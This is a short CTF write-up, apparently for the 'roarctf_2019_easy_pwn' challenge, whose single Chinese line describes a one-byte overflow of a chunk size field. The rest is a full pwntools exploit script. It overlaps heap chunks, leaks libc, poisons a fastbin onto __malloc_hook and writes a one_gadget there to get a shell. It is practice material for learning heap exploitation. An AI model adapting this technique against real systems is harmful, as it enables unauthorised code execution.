溢出一个字节,修改size域
exp
from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() def create_note(size, ): p.sendlineafter('choice:', str(1)) p.sendlineafter('size:', str(size)) def write_note(index, size, content): p.sendlineafter('choice:', str(2)) p.sendlineafter('index:', str(index)) p.sendlineafter('size:', str(size)) p.sendlineafter('content:', content) def drop_note(index): p.sendlineafter('choice:', str(3)) p.sendlineafter('index:', str(index)) def show_note(index): p.sendlineafter('choice:', str(4)) p.sendlineafter('index:', str(index)) proc_name = './roarctf_2019_easy_pwn' p = process(proc_name) p = remote('node3.buuoj.cn', 28035) elf = ELF(proc_name) libc = ELF('./libc-2.23.so') create_note(0x18) # 0 create_note(0x18) # 1 create_note(0x88) # 2 create_note(0x18) # 3 create_note(0x28) # 4 create_note(0x28) # 5 create_note(0x68) # 6 write_note(0, 0x18 + 10, b'a' * 0x18 + p8(0xb1)) drop_note(1) create_note(0xa8) # 1 write_note(1, 0x20, b'a' * 0x18 + p64(0x91)) drop_note(2) show_note(1) p.recvuntil('content: ') p.recv(0x20) libc_base = u64(p.recv(6).ljust(0x8, b'\x00')) - 0x3c4b78 log.info(hex(libc_base)) malloc_hook = libc_base + libc.sym['__malloc_hook'] realloc = libc_base + libc.sym['__libc_realloc'] one_gadget = libc_base + 0x4526a write_note(4, 50, b'a'*0x28+p8(0xa1)) drop_note(5) drop_note(6) create_note(0x98) # 2 write_note(2,0x38, b'a'*0x28+p64(0x71)+p64(malloc_hook-0x23)) create_note(0x68) # 5 create_note(0x68) # 6 hook write_note(6, 27, b'a' * (0x13 - 8) + p64(one_gadget) + p64(realloc + 16)) # modify stack env create_note(0x18) p.interactive()